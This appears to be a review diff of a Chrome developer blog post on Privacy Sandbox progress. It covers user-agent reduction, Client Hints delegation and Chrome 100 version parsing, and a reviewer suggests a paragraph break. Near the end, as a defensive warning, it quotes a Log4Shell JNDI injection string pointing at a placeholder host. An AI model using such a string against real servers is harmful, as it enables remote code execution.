site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md

```diff
@@ -0,0 +1,196 @@
+  </table>
+  <figcaption>
+    <a href="https://docs.google.com/spreadsheets/d/e/2PACX-1vR-5YYZ-lxG9xelJFCYM2yajUEWUNKZkiXcWX9BYi8dSUV_5Xrhd5u-iyNNf4w8NAVwrSrVWjeNrC-i/pubhtml#">Source</a>
+  </figcaption>
+</figure>
+
+The language in explainers and specifications is often targeted to an audience
+already familiar with standards and browser development, which can be
+challenging if you're unfamiliar with it. However, the aim of an explainer is to
+explain! If there are points that are unclear or not covered, **we want you to
+raise an Issue** so we can update and clarify the explainer.
+
+## Resolutions
+
+### User-agent spring cleaning
+
+As we were counting _down_ to the New Year, we're also counting _up_ to both
+[Chrome 100](/blog/force-major-version-to-100/) and the incremental [reduction
+of the user-agent string](/docs/privacy-sandbox/user-agent/). This is a good
+motivator to revisit any usage of the user-agent string in your code to check if
+it's affected by either of these changes.
+
+To find those areas:
+
+1. Search for `navigator.userAgent` in your JavaScript code, or access to the
+   `User-Agent` header in your server code.
+2. Check your parsing of the string for assumptions about a 2 digit version. For
+   example, a regex that specifies `\d\d` or `\d{2}` should be replaced with
+   `\d+`.
+3. Check your use of the string for anywhere you rely on the:
+    * platform (operating system) version
+    * full Chrome build version
+    * mobile device name
+4. These are the values that will be reduced to fixed strings in the future. If
+   you need access to these values, [migrate to User-Agent Client
+   Hints](https://web.dev/migrate-to-ua-ch/).
+
+There is one December update to mention—if you are adopting User-Agent Client
+Hints then we have sent the **Intent to Ship to [enable delegating hints to
+other origins in
+HTML](https://groups.google.com/a/chromium.org/g/blink-dev/c/JQ68cvYuiQU/m/S_33YSqxCwAJ)**
+via a `<meta>` tag, for example:
+
+```html
+<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">`
+```
+
+If you're in an enthusiastic spring cleaning mood, you can also consider
+alternatives to the use of user-agent altogether. If you're using the string to
+detect mobile devices, then investigate if you can replace this with responsive
+design. If you're checking the browser name and version for feature support, see
+if you can use feature detection instead.
+
+It's always worth remembering that the user-agent, like any client provided
+value, is not guaranteed to be accurate or even provided. The recent [Log4j
+vulnerability, "Log4shell"](https://logging.apache.org/log4j/2.x/security.html)
+provides an example of this risk. A client that sets its user-agent string to
+include a value like `${jndi:ldap://example.com/file}` may be able to get a site
+to actively parse that on the server. It's critical that you treat user-agent in
```

Comment:
```suggestion
to actively parse that on the server.

It's critical that you treat user-agent in
```

Separating this sentence from the paragraph as it should get attention and not risk the end-of-paragraph skim.